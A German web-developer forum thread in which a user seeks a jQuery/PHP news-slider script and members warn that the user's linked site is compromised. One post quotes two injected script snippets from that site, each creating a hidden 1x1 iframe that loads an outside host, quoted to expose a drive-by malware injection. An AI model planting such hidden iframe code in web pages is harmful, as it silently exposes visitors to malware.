Ankündigung

Einklappen
Keine Ankündigung bisher.

Newsscript mit Bildern

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

• Newsscript mit Bildern

Suche ein Script, das die News zum einen immer mit einem Bild im Hintergrund anzeigt, z.B. 4 verschiedene News zum durchklicken.
    Zum anderen soll auch noch ein einfaches Archiv dabei sein.

Ich gehe davon aus, dass es sowas schon gibt, nur weiss ich nicht, wonach bzw. welchem Begriff ich suchen muss.

Hier mal ein Link, wie das ganze aussehen sollte:
    [MOD: entfernt] (ohne Funktion)

Kann mir hier jemand weiterhelfen oder einen Tipp geben?

Danke!

Achtung: Chromium warnt beim Anklicken des Links vor Malware. Dass der Link hier über bit.ly gepostet wurde, macht die Sache auch nicht vertrauenerweckender.

Kommentar

firefox auch:
      und die seite hat ca 2300 leerzeilen, bevor sie anfängt !
      super!
      hab sie mal attached und auf den ersten gflüchtigen blick nichts bösses gefunden - bis auf google
      Angehängte Dateien

Kommentar

Zitat von moma Beitrag anzeigen
        firefox auch:
        und die seite hat ca 2300 leerzeilen, bevor sie anfängt !
        super!
        hab sie mal attached und auf den ersten gflüchtigen blick nichts bösses gefunden - bis auf google
        Wenn man mal genau sein will: 2315 Zeilen

Kommentar

ok, hab nicht so genau gezählt

also schadcode gefunden?

Kommentar

Es geht nicht um die verlinkte Unterseite... Der bzw. die Schadcode(s), dürfte(n) diese(r) Code(s) von der index sein:

PHP-Code:

<script>var url "http://hotplay24.net";if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){   var document.createElement('iframe');   f.setAttribute("width""1");   f.setAttribute("height""1");   f.setAttribute("src"url);   f.setAttribute("style""visibility: hidden; position: absolute; left: 0pt; top: 0pt;");   document.getElementsByTagName("body")[0].appendChild(f);}</script>

<!-- bnr1131 --><script>var f=document.createElement("iframe");var url="http://fweorganisations.c0m.li/in.cgi?3";f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f);</script><!-- bnr1131 --> 

Vielleicht möchte jemand mit einem Trojaner euer php.de Login ermitteln...

Kommentar

sorry, binde mal einen screenshot ein, der reicht ja auch aus

Oben "1, 2, 3, 4" da sollen 4 verschiedene News (immer die neusten zb) dahinterliegen und im Archiv dann alle folgenden News.

Kommentar

was willste jetzt genau?

vier links über dein bild legen und beim draufklicken ein neues hintergrundbild haben?

oder suchst du den begriff "cms"?

Kommentar

Nein, ich wollte wissen ob ihr eine Seite kenn oder vll. auch ein Script, in dem ich ein Newsslider-System mit PHP-Anbindung finde.

Also ich will quasi in einem (vielleicht) CMS Artikel anlegen mit Bildern und diese sollen dann in einem (jQuery?) Objekt auf der Startseite wie im Screenshot angezeigt werden.

Meine Frage ist, lieg ich mit jQuery richtig? Gibt es fertige bzw. ähnliche Scripte vll. schon fertig?

Kommentar

Ja, gibt es fertig.

Kommentar

darf ich auch fragen wo? Muss ja nicht umsonst sein...

Kommentar

niemand einen Tipp? Wenn es ja angeblich was gibt...

Kommentar

also ich habe mal bei google eingegeben: "jquery news slider"

http://www.tripwiremagazine.com/2013...ry-slider.html

danach "jquery carousel"

http://www.tripwiremagazine.com/2012...-carousel.html

Kommentar

Lädt...
                          X